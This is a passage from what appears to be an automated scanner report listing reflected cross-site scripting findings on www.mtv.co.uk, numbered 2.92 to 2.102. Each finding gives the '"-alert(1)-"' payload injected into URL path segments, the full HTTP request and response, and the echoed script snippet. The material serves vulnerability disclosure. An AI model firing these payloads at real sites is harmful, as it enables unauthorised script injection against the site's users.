Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13459
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:39 GMT
Date: Mon, 12 Sep 2011 12:50:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/contenta9a84"-alert(1)-"276e5b2f698/flashbox/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.
...[SNIP]...

2.92. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c3f"-alert(1)-"6b0f5865cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:46 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13464
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:46 GMT
Date: Mon, 12 Sep 2011 12:50:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
orting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox75c3f"-alert(1)-"6b0f5865cdd/42684-mtv-uk-homepage-615x340");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttrib
...[SNIP]...

2.93. http://www.mtv.co.uk/content/flashbox/42684-mtv-uk-homepage-615x340 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /content/flashbox/42684-mtv-uk-homepage-615x340

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb0b9"-alert(1)-"f96d614e794 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794?render=xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13465
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:53 GMT
Date: Mon, 12 Sep 2011 12:50:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/content/flashbox/42684-mtv-uk-homepage-615x340bb0b9"-alert(1)-"f96d614e794");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.94. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e2a2"-alert(1)-"6efac768962 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files4e2a2"-alert(1)-"6efac768962/favicon.ico HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:48 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:48 GMT
Date: Mon, 12 Sep 2011 12:50:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files4e2a2"-alert(1)-"6efac768962/favicon.ico");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
...[SNIP]...

2.95. http://www.mtv.co.uk/files/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeecc"-alert(1)-"a82a271c334 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/favicon.icoaeecc"-alert(1)-"a82a271c334 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:50:55 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13403
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:50:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:50:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/files/favicon.icoaeecc"-alert(1)-"a82a271c334");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.96. http://www.mtv.co.uk/misc/thickbox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /misc/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d548"-alert(1)-"85713fad3dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/9d548"-alert(1)-"85713fad3dc?1234890360 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13383
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/misc/9d548"-alert(1)-"85713fad3dc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.97. http://www.mtv.co.uk/modules/node/node.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1113"-alert(1)-"742e68c81f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/node/b1113"-alert(1)-"742e68c81f7?1234890364 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:52 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13395
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:52 GMT
Date: Mon, 12 Sep 2011 12:49:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/node/b1113"-alert(1)-"742e68c81f7");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.98. http://www.mtv.co.uk/modules/system/defaults.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bfa3"-alert(1)-"b3ed22fa9a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/4bfa3"-alert(1)-"b3ed22fa9a2?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:51 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13399
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:51 GMT
Date: Mon, 12 Sep 2011 12:49:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/4bfa3"-alert(1)-"b3ed22fa9a2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.99. http://www.mtv.co.uk/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18ade"-alert(1)-"c57ecfadbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/system/18ade"-alert(1)-"c57ecfadbe?1234890363 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13401
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
porting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/system/18ade"-alert(1)-"c57ecfadbe");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.100. http://www.mtv.co.uk/modules/user/user.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dce4"-alert(1)-"99564bbadd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/user/9dce4"-alert(1)-"99564bbadd4?1234890366 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13398
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:50 GMT
Date: Mon, 12 Sep 2011 12:49:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/modules/user/9dce4"-alert(1)-"99564bbadd4");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.101. http://www.mtv.co.uk/sites/all/modules/cck/content.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/cck/content.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c31"-alert(1)-"2f891d8457f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f?1234890340 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:53 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13413
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:53 GMT
Date: Mon, 12 Sep 2011 12:49:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/cck/49c31"-alert(1)-"2f891d8457f");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.102. http://www.mtv.co.uk/sites/all/modules/fckeditor/fckeditor.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/fckeditor/fckeditor.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 326da"-alert(1)-"6d091b0c1cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc?1234890357 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:49:54 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13423
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:49:55 GMT
Date: Mon, 12 Sep 2011 12:49:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/fckeditor/326da"-alert(1)-"6d091b0c1cc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
